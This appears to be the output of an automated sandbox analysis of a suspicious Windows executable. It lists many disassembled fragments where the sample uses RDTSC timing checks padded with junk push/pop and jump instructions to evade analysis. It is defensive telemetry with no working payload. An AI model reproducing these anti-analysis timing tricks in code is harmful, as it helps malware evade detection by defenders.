Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7138 second address: 4F713E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FCE1E second address: 4FCE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB372 second address: 4BB376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB376 second address: 4BB37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB3B3 second address: 4BB3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFDC second address: 4BBFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFE1 second address: 4BC056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F7210C23A1Fh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F7210C23A08h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add cx, 70F6h 0x00000030 lea eax, dword ptr [ebp+1248C959h] 0x00000036 mov edi, dword ptr [ebp+122D180Dh] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F7210C23A0Eh 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC056 second address: 4A509C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72110537AEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 movsx edi, di 0x00000013 jmp 00007F72110537B7h 0x00000018 call dword ptr [ebp+1245C3D9h] 0x0000001e pushad 0x0000001f je 00007F72110537ACh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC282 second address: 4FC286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC286 second address: 4FC2AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72110537B9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC2AB second address: 4FC2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC2AF second address: 4FC2D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F72110537A6h 0x00000008 jmp 00007F72110537AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F72110537A8h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F72110537A6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC2D7 second address: 4FC2F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F7210C23A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jl 00007F7210C23A06h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007F7210C23A06h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC453 second address: 4FC457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC5B9 second address: 4FC5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC5BE second address: 4FC5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC5C4 second address: 4FC5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC5CA second address: 4FC5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC5CE second address: 4FC5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501FD1 second address: 501FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5022A8 second address: 5022B2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502596 second address: 50259B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50259B second address: 5025A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5025A0 second address: 5025A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502C7C second address: 502C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502C82 second address: 502C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502C86 second address: 502C93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 505274 second address: 505278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507EFA second address: 507F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F7210C23A06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 508204 second address: 50821B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F72110537A6h 0x0000000a je 00007F72110537AAh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50821B second address: 50824B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F7210C23A13h 0x0000000e jmp 00007F7210C23A0Bh 0x00000013 jng 00007F7210C23A06h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50824B second address: 508261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F72110537AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CB38 second address: 50CB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CB3C second address: 50CBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72110537B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F72110537B4h 0x00000011 jmp 00007F72110537AEh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F72110537ACh 0x0000001f jng 00007F72110537A6h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F72110537B5h 0x0000002c jmp 00007F72110537B5h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CBA5 second address: 50CBAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CCF5 second address: 50CCFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CF8E second address: 50CF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50CF94 second address: 50CFA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50FDAA second address: 50FE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7210C23A06h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F7210C23A19h 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edi 0x00000015 jmp 00007F7210C23A18h 0x0000001a jmp 00007F7210C23A10h 0x0000001f pop edi 0x00000020 jl 00007F7210C23A12h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50FE04 second address: 50FE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50FF67 second address: 50FF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50FF6B second address: 50FF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F72110537A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F72110537B2h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170EF second address: 5170F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515C12 second address: 515C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515C16 second address: 515C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 515C23 second address: 515C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 516023 second address: 516030 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 516030 second address: 51605C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F72110537A6h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F72110537AEh 0x00000014 pushad 0x00000015 jnp 00007F72110537A6h 0x0000001b jno 00007F72110537A6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5161D8 second address: 5161DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB991 second address: 4BB995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 516484 second address: 51648E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7210C23A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 516E15 second address: 516E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51EA21 second address: 51EA2B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7210C23A0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C927 second address: 51C933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D7D7 second address: 51D7F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D7F4 second address: 51D7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E372 second address: 51E392 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7210C23A06h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push esi 0x0000000f jnl 00007F7210C23A06h 0x00000015 jnc 00007F7210C23A06h 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E392 second address: 51E396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E705 second address: 51E709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E709 second address: 51E724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E724 second address: 51E73F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51E73F second address: 51E744 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522A84 second address: 522A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522BF4 second address: 522BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523009 second address: 52300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52300D second address: 523061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F72110537B6h 0x00000010 jmp 00007F72110537B8h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F72110537B8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 523061 second address: 523073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7210C23A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52345C second address: 523460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529A55 second address: 529A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 484996 second address: 48499A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52BE59 second address: 52BE78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7210C23A17h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D4BC second address: 52D4D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F72110537A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F72110537A8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5341E6 second address: 5341EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53435B second address: 534370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F72110537ACh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534370 second address: 53437A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7210C23A17h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5347D1 second address: 5347EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F72110537A6h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F72110537AAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534BD0 second address: 534BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534BD6 second address: 534BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534D5B second address: 534D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F7210C23A0Eh 0x0000000a pop ecx 0x0000000b jo 00007F7210C23A0Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535794 second address: 535798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535798 second address: 5357B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7210C23A12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5357B5 second address: 5357CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F72110537ACh 0x0000000b jne 00007F72110537AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533D89 second address: 533D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533D8D second address: 533DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72110537AEh 0x00000009 jmp 00007F72110537ACh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533DAB second address: 533DB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A213 second address: 53A219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A219 second address: 53A21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A21D second address: 53A228 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F72110537A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0BF second address: 53A0DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7210C23A15h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47DF7C second address: 47DF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D29D second address: 53D2B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54B22B second address: 54B22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55204A second address: 55206A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007F7210C23A06h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F7210C23A06h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55206A second address: 55206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55353A second address: 553543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477562 second address: 47756C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72110537A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47756C second address: 477591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7210C23A17h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 477591 second address: 477595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F062 second address: 46F074 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7210C23A0Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 46F074 second address: 46F090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F72110537AEh 0x0000000d jp 00007F72110537A6h 0x00000013 rdtsc
